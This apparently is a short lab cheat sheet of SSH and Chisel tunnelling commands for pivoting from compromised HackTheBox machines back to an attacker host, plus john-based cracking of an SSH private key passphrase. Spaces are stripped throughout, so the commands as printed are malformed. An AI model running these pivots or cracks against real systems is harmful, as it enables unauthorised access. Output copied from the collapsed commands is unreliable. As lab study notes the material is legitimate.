$sshroot@beep.htbUnable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ssh-oKexAlgorithms=+diffie-hellman-group-exchange-sha1root@beep.htb
SSH Tunneling
//Remotetunnelfromvictim,enumvictimport5432 (postgresql)ssh-N-f-R5432:localhost:5432p3@10.10.14.10//Localtunnelfromattacker,enumvictimport8002ssh-N-f-L8002:localhost:8002hflaccus@carpediem.htbssh-N-f-L3306:localhost:3306charlie@extension.htb-iid_rsa## Using Chisel to enumerate local webservices on remote host//ChiselServer (attacker host)$./chisel_1.7.7_linux_amd64server-p4444-reverse//ChiselClient (victim host)$./chisel_1.7.7_linux_amd64client10.10.14.5:4444R:8080:127.0.0.1:8080## Using Chisel to setup a tunnel from compromized docker container to proxy## traffic toward docker host (172.17.0.1:3000). //ChiselServer (attacker host)$./chisel_1.7.7_linux_amd64server-p3333-reverse//ChiselClient (victim docker)./chisel_1.7.7_linux_amd64client10.10.15.17:3333R:127.0.0.1:3000:172.17.0.1:3000
Brute Force id_rsa
//Convertid_rsa (.pem) to hash with ssh2john, and crack with john.$ssh2john.pyid_rsa>id_rsa.hash$johnid_rsa.hash-wordlist=/usr/share/wordlists/rockyou.txt
Vault SSH OTP
Vault is used to provice one-time passwords (OTP) for SSH logins. To request a OTP you need to know the role example ssh/creds/otp_key_role, the role is found in secrets.sh.
